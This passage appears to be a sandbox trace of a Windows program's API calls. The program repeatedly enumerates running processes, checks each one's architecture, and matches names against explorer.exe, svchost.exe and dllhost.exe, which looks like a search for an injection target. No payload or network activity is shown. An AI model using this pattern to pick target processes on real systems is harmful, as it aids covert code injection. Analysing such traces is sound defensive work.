lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0210.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0210.762] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.762] CloseHandle (hObject=0xd8) returned 1 [0210.763] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0210.763] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0210.763] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0210.763] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0210.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0210.763] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0210.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0210.764] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.764] CloseHandle (hObject=0xd8) returned 1 [0210.764] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0210.764] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0210.764] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0210.764] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0210.764] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0210.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0210.765] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0210.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0210.766] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.766] CloseHandle (hObject=0xd8) returned 1 [0210.766] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0210.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0210.766] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.766] CloseHandle (hObject=0xd8) returned 1 [0210.766] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0210.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0210.767] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.767] CloseHandle (hObject=0xd8) returned 1 [0210.767] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0210.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0210.767] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.767] CloseHandle (hObject=0xd8) returned 1 [0210.768] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0210.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0210.768] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.768] CloseHandle (hObject=0xd8) returned 1 [0210.768] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0210.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0210.769] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.769] CloseHandle (hObject=0xd8) returned 1 [0210.769] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0210.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0210.769] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.769] CloseHandle (hObject=0xd8) returned 1 [0210.769] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0210.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0210.770] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.770] CloseHandle (hObject=0xd8) returned 1 [0210.770] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0210.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0210.770] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.770] CloseHandle (hObject=0xd8) returned 1 [0210.770] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0210.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0210.771] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.771] CloseHandle (hObject=0xd8) returned 1 [0210.771] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0210.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0210.771] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.771] CloseHandle (hObject=0xd8) returned 1 [0210.772] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0210.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0210.772] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.772] CloseHandle (hObject=0xd8) returned 1 [0210.772] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0210.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0210.773] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.773] CloseHandle (hObject=0xd8) returned 1 [0210.773] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0210.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0210.773] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.773] CloseHandle (hObject=0xd8) returned 1 [0210.773] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0210.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0210.774] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.774] CloseHandle (hObject=0xd8) returned 1 [0210.774] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0210.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0210.774] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.774] CloseHandle (hObject=0xd8) returned 1 [0210.774] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0210.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0210.775] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.775] CloseHandle (hObject=0xd8) returned 1 [0210.775] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0210.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0210.776] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.776] CloseHandle (hObject=0xd8) returned 1 [0210.776] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0210.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0210.776] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.776] CloseHandle (hObject=0xd8) returned 1 [0210.776] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0210.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0210.777] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.777] CloseHandle (hObject=0xd8) returned 1 [0210.777] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0210.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0210.777] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.777] CloseHandle (hObject=0xd8) returned 1 [0210.777] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0210.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0210.778] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0210.778] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0210.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0210.779] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0210.779] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0210.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0210.780] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0210.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0210.780] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0210.781] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.781] CloseHandle (hObject=0xd8) returned 1 [0210.781] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0210.781] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0210.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0210.782] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.782] CloseHandle (hObject=0xd8) returned 1 [0210.782] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0210.782] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0210.782] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0210.782] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0210.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0210.782] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0210.827] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.827] CloseHandle (hObject=0xd8) returned 1 [0210.827] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0210.828] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.828] CloseHandle (hObject=0xd8) returned 1 [0210.828] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0210.828] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0210.828] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.828] CloseHandle (hObject=0xd8) returned 1 [0210.828] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0210.829] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0210.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0210.829] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0210.829] CloseHandle (hObject=0xd8) returned 1 [0210.830] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0210.830] CloseHandle (hObject=0xd4) returned 1 [0210.830] Sleep (dwMilliseconds=0x3e8) [0211.882] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0211.884] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0211.885] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0211.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0211.885] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0211.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0211.886] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0211.886] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0211.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0211.887] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0211.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0211.887] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0211.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0211.888] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0211.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0211.889] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0211.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0211.890] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0211.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0211.890] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 